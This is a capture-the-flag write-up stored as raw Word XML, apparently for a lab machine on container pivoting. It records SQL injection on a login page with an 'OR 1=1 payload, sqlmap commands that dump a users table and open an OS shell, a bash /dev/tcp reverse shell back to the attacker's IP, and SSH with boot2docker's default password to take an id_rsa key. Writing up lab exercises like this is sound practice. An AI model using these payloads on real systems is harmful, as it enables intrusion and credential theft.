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546D19" w14:textId="3221D2D8" w:rsidR="00EF6B1C" w:rsidRDefault="0071715B">
      <w:r>
        <w:t>Container and pivoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A28095" w14:textId="5CAD04EE" w:rsidR="0071715B" w:rsidRDefault="0071715B">
      <w:r w:rsidRPr="0071715B">
        <w:t>Docker, Kubernetes and other popular virtualization technologies allow for moving laterally and vertically in an infrastructure. Master this track and become an escape artist!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B18FC89" w14:textId="538BA32F" w:rsidR="0071715B" w:rsidRDefault="0071715B">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Toolbox:-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2F001B3E" w14:textId="776F66C6" w:rsidR="0071715B" w:rsidRDefault="0071715B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0484CE1F" wp14:editId="7CEBA6EA">
            <wp:extent cx="5943600" cy="3254559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9006" cy="32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BF3B" w14:textId="438001FC" w:rsidR="0071715B" w:rsidRDefault="0071715B">
      <w:r>
        <w:t>The ftp is allowed and docker toolbox which is big file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745D8E04" w14:textId="3D792177" w:rsidR="0071715B" w:rsidRDefault="0071715B">
      <w:r>
        <w:t xml:space="preserve">Let ftp </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> which give the access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B05A386" w14:textId="136DBCDA" w:rsidR="0071715B" w:rsidRDefault="0071715B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="381E5185" wp14:editId="410261C6">
            <wp:extent cx="5943600" cy="1138592"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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3586" cy="11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BB74" w14:textId="3CDF4223" w:rsidR="0071715B" w:rsidRDefault="0071715B">
      <w:r>
        <w:t xml:space="preserve">On checking the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>site ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> viewing the certificate show the admin contact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF9097C" w14:textId="48B11347" w:rsidR="0071715B" w:rsidRDefault="0071715B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C885F7D" wp14:editId="6E4AA23E">
            <wp:extent cx="5943600" cy="1755749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8961" cy="17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58F1" w14:textId="3CBFD845" w:rsidR="00344A7C" w:rsidRDefault="00344A7C">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> add it to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/hosts </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D890C8" w14:textId="08C3653D" w:rsidR="00344A7C" w:rsidRDefault="00344A7C">
      <w:r>
        <w:t xml:space="preserve">Check </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> access via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> doesn’t give anything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0F8C15" w14:textId="6C93F2E5" w:rsidR="00344A7C" w:rsidRDefault="00344A7C">
      <w:r>
        <w:t xml:space="preserve">Let check the URL with the variation of possible </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>organization ,we</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> do get login </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DA3DDF" w14:textId="70A24F0B" w:rsidR="00344A7C" w:rsidRDefault="00344A7C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="523AB420" wp14:editId="6B77DE91">
            <wp:extent cx="5943600" cy="2581983"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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9838" cy="258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4844" w14:textId="305220B8" w:rsidR="00344A7C" w:rsidRDefault="00344A7C">
      <w:r>
        <w:t>This is SQLi vulnerable checked by ‘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BE0F14" w14:textId="2B42E32C" w:rsidR="004D4657" w:rsidRDefault="004D4657">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53C5BD7E" wp14:editId="6FA515D1">
            <wp:extent cx="5943600" cy="83947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C65B" w14:textId="2578449D" w:rsidR="004D4657" w:rsidRDefault="004D4657">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B1B9841" wp14:editId="5BD56B0A">
            <wp:extent cx="5943600" cy="154495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F6AE" w14:textId="27D18F56" w:rsidR="004D4657" w:rsidRDefault="004D4657">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Simple payload admin’OR’1’=1—did the magic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D74940F" w14:textId="51A3F4BD" w:rsidR="00AC5424" w:rsidRDefault="00AC5424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capture the request via burp and supply it to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for better efficiency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F0C9D5" w14:textId="77CF9085" w:rsidR="00AC5424" w:rsidRDefault="00AC5424">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC5424">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC5424">
        <w:t xml:space="preserve"> -r sql.txt --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC5424">
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC5424">
        <w:t xml:space="preserve"> --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DBF11B" w14:textId="70E83021" w:rsidR="00AC5424" w:rsidRDefault="00AC5424">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DA4A030" wp14:editId="20362D73">
            <wp:extent cx="5943600" cy="1809115"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="7" name="Picture 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background patter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5EE6" w14:textId="660BC034" w:rsidR="00AC5424" w:rsidRDefault="00AC5424">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41E3C55B" wp14:editId="4F94E8F6">
            <wp:extent cx="5943600" cy="5441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8146" w14:textId="00D18333" w:rsidR="00353FD4" w:rsidRDefault="00353FD4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00353FD4">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00353FD4">
        <w:t xml:space="preserve"> -r sql.txt -D public --tables </w:t>
      </w:r>
      <w:r w:rsidR="00F714EE">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00353FD4">
        <w:t>batch</w:t>
      </w:r>
      <w:r w:rsidR="00F714EE">
        <w:t xml:space="preserve"> //to get the users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A2E737" w14:textId="1A47FE0D" w:rsidR="00F714EE" w:rsidRDefault="00F714EE">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F714EE">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F714EE">
        <w:t xml:space="preserve"> -r sql.txt -D public -T users --dump </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00F714EE">
        <w:t>batch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> // to get the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E9FBA2" w14:textId="3848101D" w:rsidR="00F714EE" w:rsidRDefault="00F714EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CB4F9F6" wp14:editId="75CF99B1">
            <wp:extent cx="5943600" cy="1571861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5853" cy="157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0945" w14:textId="2E5C97CD" w:rsidR="00F714EE" w:rsidRDefault="00F714EE">
      <w:r>
        <w:t xml:space="preserve">Try </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-shell or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BA4CB7" w14:textId="6B13E074" w:rsidR="00F714EE" w:rsidRDefault="00F714EE">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F714EE">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F714EE">
        <w:t xml:space="preserve"> -r sql.txt --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F714EE">
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F714EE">
        <w:t xml:space="preserve"> --batch --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F714EE">
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F714EE">
        <w:t>-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2A89EC" w14:textId="34CD4287" w:rsidR="00F714EE" w:rsidRDefault="00F714EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B9201D9" wp14:editId="2E66872D">
            <wp:extent cx="5943600" cy="1653540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FFFA" w14:textId="03A57177" w:rsidR="00162F21" w:rsidRDefault="00162F21">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shell ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code injection to get reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417DFFD2" w14:textId="7CFE97E0" w:rsidR="00162F21" w:rsidRDefault="00162F21">
      <w:r w:rsidRPr="00162F21">
        <w:t>bash -c 'bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00162F21">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00162F21">
        <w:t xml:space="preserve">  &gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00162F21">
        <w:t>&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00162F21">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00162F21">
        <w:t>/10.10.16.4/1234 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E156EAD" w14:textId="2AEC306C" w:rsidR="00162F21" w:rsidRDefault="00162F21">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6135BEF5" wp14:editId="179E31E1">
            <wp:extent cx="5943600" cy="78676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751A" w14:textId="23B582C4" w:rsidR="00162F21" w:rsidRDefault="00162F21">
      <w:r w:rsidRPr="00162F21">
        <w:t xml:space="preserve">python3 -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00162F21">
        <w:t>pty;pty</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00162F21">
        <w:t>.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00162F21">
        <w:t>("/bin/bash")'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> //for better UI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05664E42" w14:textId="10A451D3" w:rsidR="007F39F5" w:rsidRDefault="007F39F5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55890CB3" wp14:editId="61FB096E">
            <wp:extent cx="5943600" cy="259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C354" w14:textId="5EC91F6B" w:rsidR="009C1DA4" w:rsidRDefault="009C1DA4"/>
    <w:p w14:paraId="64C724A9" w14:textId="46D64A99" w:rsidR="009C1DA4" w:rsidRDefault="009C1DA4"/>
    <w:p w14:paraId="25F8BC4E" w14:textId="525CC551" w:rsidR="009C1DA4" w:rsidRDefault="009C1DA4"/>
    <w:p w14:paraId="4C0A8B1E" w14:textId="4B87DDCE" w:rsidR="009C1DA4" w:rsidRDefault="009C1DA4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="365514DC" w14:textId="68C2F415" w:rsidR="009C1DA4" w:rsidRDefault="009C1DA4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B3BEBCA" wp14:editId="6F81FC8F">
            <wp:extent cx="5943600" cy="1920875"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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A678" w14:textId="50A69E36" w:rsidR="009C1DA4" w:rsidRDefault="009C1DA4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EF5C32E" wp14:editId="5580FE3F">
            <wp:extent cx="5943600" cy="149034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19A5" w14:textId="0EDFC1B6" w:rsidR="00B95A4B" w:rsidRDefault="009C1DA4">
      <w:r>
        <w:t>Using the default boot2docker p</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the docker on the ip</w:t>
      </w:r>
      <w:r w:rsidR="00B95A4B">
        <w:t xml:space="preserve">, copy the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B95A4B">
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B95A4B">
        <w:t xml:space="preserve"> key and </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39172295" w14:textId="6FB668F5" w:rsidR="00B95A4B" w:rsidRDefault="00B95A4B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43E5782A" wp14:editId="723CB77B">
            <wp:extent cx="5943600" cy="906145"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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5A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15B"/>
    <w:rsid w:val="00162F21"/>
    <w:rsid w:val="00344A7C"/>
    <w:rsid w:val="00353FD4"/>
    <w:rsid w:val="004D4657"/>
    <w:rsid w:val="0071715B"/>
    <w:rsid w:val="007F39F5"/>
    <w:rsid w:val="009C1DA4"/>
    <w:rsid w:val="00AC5424"/>
    <w:rsid w:val="00B95A4B"/>
    <w:rsid w:val="00EF6B1C"/>
    <w:rsid w:val="00F71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AC051"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2479A576-D34E-41B5-BBA5-BAAC0829E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5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aamir</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>syed aamir</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-30T21:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-31T00:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>